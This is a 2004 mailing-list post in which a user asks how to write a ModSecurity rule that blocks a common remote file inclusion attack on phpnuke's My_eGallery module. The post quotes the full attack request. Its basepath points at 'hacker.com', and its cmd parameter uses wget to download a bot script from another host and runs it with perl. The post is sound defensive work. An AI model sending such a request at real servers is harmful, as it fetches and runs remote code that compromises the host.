[mod-security-users] rule for common My_eGallery exploit
Brought to you by:
victorhora,
zimmerletw
Menu
▾
▴
[mod-security-users] rule for common My_eGallery exploit
|
From: Hugh B. <hbe...@ya...> - 2004-08-23 12:01:48
|
Hi, Does anyone have a good rule to catch the following types of requests: GET /modules/My_eGallery/public/displayCategory.php?basepath=http://hacker.com/spy.gif?&cmd=cd%20/var/tmp;wget%20http://www.hacker2.org/bot.txt;perl%20bot.txt This is a very common exploit against phpnuke's eGallery module. I am new to mod_security and am not sure what the best rule would be to block these requests without also blocking other requests with the work basepath in it. I think the key part would be something like: block everything with the string: ?basepath or ?basepath=http Any ideas? Thanks in advance! _______________________________ Do you Yahoo!? Win 1 of 4,000 free domain names from Yahoo! Enter now. http://promotions.yahoo.com/goldrush |
